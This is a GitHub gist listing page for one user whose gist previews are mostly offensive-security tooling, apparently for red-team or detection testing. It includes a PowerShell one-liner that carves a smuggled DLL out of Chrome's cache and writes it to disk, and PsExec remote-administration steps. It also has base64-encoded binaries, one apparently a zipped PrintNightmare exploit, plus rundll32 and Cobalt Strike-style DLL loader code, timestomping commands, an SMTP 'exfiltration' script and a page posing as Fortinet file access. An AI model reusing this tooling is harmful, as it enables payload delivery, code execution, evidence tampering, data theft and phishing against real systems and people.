Skip to content

Instantly share code, notes, and snippets.

View justaguywhocodes's full-sized avatar

Toussaint Louverture justaguywhocodes

130 followers · 833 following
View GitHub Profile
@justaguywhocodes
justaguywhocodes / bcs.ps1
Created February 2, 2026 16:49
$d="$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cache\Cache_Data\"; if (Test-Path $d) { gci $d -File | ForEach-Object { try { $s = [System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($_.FullName)); if ($s -match '(?s)INDLL(?<content>.*?)OUTDLL') { [System.IO.File]::WriteAllBytes("$d\hello.dll", [System.Text.Encoding]::Default.GetBytes($matches['content'])); Write-Host " found in $($_.Name). Extracted to $d\hello.dll"; break } } catch { Write-Warning "Error processing $($_.Name): $_" } }; if (!$?) { Write-Host "No matches found" } }
@justaguywhocodes
justaguywhocodes / psexec
Created January 28, 2026 19:58
Step 0: Pre-requisites - Enable Remote Administration on the Remote Machine
We need to ensure the remote machine allows remote administration. We'll do:
0.1 Enable File and Printer Sharing (SMB) and Remote Administration exceptions in Windows Firewall.
We can use netsh to enable the firewall rules. We'll run these commands on the remote machine. Since we are testing, we can use PsExec to run these commands remotely.
Note: This step might already be done in your environment. If you are in a lab and the firewall is off, you can skip. But for completeness:
cmd
Copy
@justaguywhocodes
justaguywhocodes / core.dll
Created January 28, 2026 14:45
// testdll.c
// Simple Windows DLL that exports a function compatible with rundll32.exe
// When called via rundll32.exe testdll.dll,ExecuteTest
// it writes "test executed" to C:\Users\Public\Downloads\test.txt
#include <windows.h>
#include <stdio.h>
// Exported function (rundll32-compatible signature)
extern "C" __declspec(dllexport) void CALLBACK ExecuteTest(
@justaguywhocodes
justaguywhocodes / core.b64
Created January 28, 2026 14:44
VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFDQUVBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFDdUVMaXo2bkhXNE9weDF1RHFjZGJnNHdsRjRPNXgxdUJ0K05maDZYSFc0RzM0MWVIcGNkYmdiZmpTNGVKeDF1QnQrTlBoNFhIVzRKUHcxK0hvY2RiZzZuSFg0TTl4MXVCOCtOL2g2SEhXNEh6NDF1SHJjZGJnZlBncDRPdHgxdUI4K05UaDYzSFc0RkpwWTJqcWNkYmdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQVVFVUFBR1NHQmdBSUducHBBQUFBQUFBQUFBRHdBQ0lnQ3dJT0xBQVNBQUFBSEFBQUFBQUFBQ1FVQUFBQUVBQUFBQUFBZ0FFQUFBQUFFQUFBQUFJQUFBWUFBQUFBQUFBQUJnQUFBQUFBQUFBQWdBQUFBQVFBQUFBQUFBQUNBR0FCQUFBUUFBQUFBQUFBRUFBQUFBQUFBQUFBRUFBQUFBQUFBQkFBQUFBQUFBQUFBQUFBRUFBQUFBQTVBQUJNQUFBQVREa0FBR1FBQUFBQVlBQUErQUFBQUFCUUFBRFVBUUFBQUFBQUFBQUFBQUFBY0FBQUxBQUFBREF6QUFCd0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQThERUFBRUFCQUFBQUFBQUFBQUFBQUFBd0FBQUlBUUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFMblJsZUhRQUFBQVlFQUFBQUJBQUFBQVNBQUFBQkFBQUFBQUFBQUFBQUFBQUFBQUFJQUFBWUM1eVpHRjBZUUFB
@justaguywhocodes
justaguywhocodes / gist:70560e9d0d29158f84b1d986a123a157
Created January 28, 2026 01:17
https://www.visualcapitalist.com/wp-content/uploads/2023/08/global-economy-2023-1200px.jpg
@justaguywhocodes
justaguywhocodes / timestomping
Created January 26, 2026 17:58
Step-by-Step Commands
Install the PowerForensics Module (if not installed):
powershell
Copy
Install-Module -Name PowerForensics -Force -Confirm:$false -Scope CurrentUser
Create a Test File (e.g., C:\test\malicious.txt):
powershell
Copy
@justaguywhocodes
justaguywhocodes / smtp.py
Created January 23, 2026 20:31
import smtplib
from email.mime.text import MIMEText
# CONFIGURATION (TEST CREDENTIALS ONLY)
sender_email = "[email protected]" # Use a dedicated TEST account
password = "yourpassword" # Generate an App Password: https://myaccount.google.com/apppasswords
receiver_email = "[email protected]"# Destination
smtp_server = "smtp.gmail.com"
port = 587 # TLS port
message = "Simulated TrillClient data exfiltration test."
@justaguywhocodes
justaguywhocodes / cobalt.txt
Created January 19, 2026 19:59
1. Create a Test DLL Loader
Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:
c
Copy
#include <windows.h>
// Export a function (common in Cobalt Strike loaders)
__declspec(dllexport) void Run(void) {
// Benign test action: create a temporary file
HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",
@justaguywhocodes
justaguywhocodes / fortinet.html
Last active January 16, 2026 15:21
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Fortinet Secure File Access</title>
<style>
body {
margin: 0;
padding: 0;
@justaguywhocodes
justaguywhocodes / cve.b64
Created January 15, 2026 15:48
VUVzREJBb0FBQUFBQUdkSTRsSUFBQUFBQUFBQUFBQUFBQUFUQUFrQVExWkZMVEl3TWpFdE1UWTNOUzF0WVdsdUwxVlVCUUFCd3pqZllGQkxBd1FLQUFBQUNBQm5TT0pTV0syVEJVWGRBUUNCdVFJQUpBQUpBRU5XUlMweU1ESXhMVEUyTnpVdGJXRnBiaTlEVmtVdE1qQXlNUzB4TmpjMUxuQnpNVlZVQlFBQnd6amZZS3k2NlpMazFwRW0rbDlQa2MyaFdaTUdrVmdDVy9EZUhodnNPd0piWUZQTEpPeUJ3TDRHZ0psNTk0dXNqVlVpcFpabWJ0U1B6TUJ4UCs3SDNZLzc5NkV5WDlwa0xydjJUV3JYcnNwKzBzdmlNVGZSbVAzaGYvN2g3Zno4di8vdHc0LzN6ODkyb044TVc3Sy9QT0cydnU3S2VYcGpYTzRuQkVMZ24yQ2N3TjUrTU1heW5iL3M5T01mdmloUXkvem94dW1YTHcvZVAweFVaL0diUFdldmFKemZmbnA3ekhNLy9RS0NSVGsvbHZqbnBHdkE1RjFrK2lqeGphN2NQZG8zTVdxYXJrMS9YL1ZkNHBQQUY4MjdwZjd5WDVrQnZ6blRyMGY0bWVWc3hwSU1SN3JwLzJvZzN1cnVORkh2YjNQM0ZxWHBXL1RXWnErUEQ4L3ZUZG1XMHp4R2N6ZCsyWGlac3ZIdGRYcDR5bFp0OTJyZittaWFYdDJZL3Z4MjY5OFQ5NzdmSDkvbVJ6bTlKVkg3Rm1mdk91bTdoV3pMa21YTzN2WnVHZDlPMVMrYkpzczBkODBicTZwZmkwWHQvdGJOajlOZTBxWG4xK2xOZDk2b3V5UGVMTWtKL3RNT2JJZlRmdjRxRUFabFVScm5jTlliTzVack51cFJrMzFaZFI3WlczcytlT3Z5MDduc3cwSDc5MmljKzZjZnhEOEg0WWMweTZPbG5uOTUrODdwNWcvaDBidjVUWXZxTWltN1pmcnV4OSsxcVdldit4bWNmMmp3